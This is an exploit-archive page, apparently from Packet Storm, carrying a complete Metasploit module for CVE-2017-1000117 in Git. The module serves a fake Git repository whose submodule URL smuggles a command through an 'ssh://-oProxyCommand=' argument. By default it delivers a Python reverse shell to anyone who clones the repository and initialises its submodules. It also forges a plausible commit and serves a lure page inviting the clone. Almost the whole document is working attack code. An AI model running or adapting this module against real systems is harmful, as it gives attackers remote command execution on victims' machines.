all things security

Malicious GIT HTTP Server

Malicious GIT HTTP Server
Posted Aug 30, 2017
Site metasploit.com

This Metasploit module exploits CVE-2017-1000117, which affects Git versions 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This Metasploit module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialized.

tags | exploit
advisories | CVE-2017-1000117
MD5 | fe66b015869fb905b5c4e21f14770c71

Malicious GIT HTTP Server

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117',
'Description' => %q(
This module exploits CVE-2017-1000117, which affects Git
version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed
parameters from the username incorrectly. This can be used to inject
commands to the operating system when the submodule is cloned.

This module creates a fake git repository which contains a submodule
containing the vulnerability. The vulnerability is triggered when the
submodules are initialised.
),
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-1000117'],
['URL', 'http://seclists.org/oss-sec/2017/q3/280' ]
],
'DisclosureDate' => 'Aug 10 2017',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'python'
}
}
}
]
],
'DefaultOptions' =>
{
'Payload' => 'cmd/unix/reverse_python'
},
'DefaultTarget' => 0
)
)

register_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
]
)
end

def setup
@repo_data = {
git: { files: {} }
}
setup_git
super
end

def setup_git
# URI must start with a /
unless git_uri && git_uri =~ /^\//
fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
end

payload_cmd = payload.encoded + " &"
payload_cmd = Rex::Text.to_hex(payload_cmd, '%')

submodule_path = datastore['GIT_SUBMODULE']
if submodule_path.blank?
submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase
end

gitmodules = "[submodule \"#{submodule_path}\"]
path = #{submodule_path}
url = ssh://-oProxyCommand=#{payload_cmd}/
"
sha1, content = build_object('blob', gitmodules)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
sha1, content = build_object('tree', tree)
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

## build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"

sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end

# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end

# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end

def exploit
super
end

def primer
# add the git and mercurial URIs as necessary
hardcoded_uripath(git_uri)
print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
end

# handles routing any request to the mock git, mercurial or simple HTML as necessary
def on_request_uri(cli, req)
# if the URI is one of our repositories and the user-agent is that of git/mercurial
# send back the appropriate data, otherwise just show the HTML version
user_agent = req.headers['User-Agent']
if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
do_git(cli, req)
return
end

do_html(cli, req)
end

# simulates a Git HTTP server
def do_git(cli, req)
# determine if the requested file is something we know how to serve from our
# fake repository and send it if so
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
if @repo_data[:git][:files].key?(req_file)
vprint_status("Sending Git #{req_file}")
send_response(cli, @repo_data[:git][:files][req_file])
else
vprint_status("Git #{req_file} doesn't exist")
send_not_found(cli)
end
end

# simulates an HTTP server with simple HTML content that lists the fake
# repositories available for cloning
def do_html(cli, _req)
resp = create_response
resp.body = <<HTML
<html>
<head><title>Public Repositories</title></head>
<body>
<p>Here are our public repositories:</p>
<ul>
HTML
this_git_uri = URI.parse(get_uri).merge(git_uri)
resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
resp.body << <<HTML
</ul>
</body>
</html>
HTML

cli.send_response(resp)
end

# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
def git_uri
return @git_uri if @git_uri
if datastore['GIT_URI'].blank?
@git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
else
@git_uri = datastore['GIT_URI']
end
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close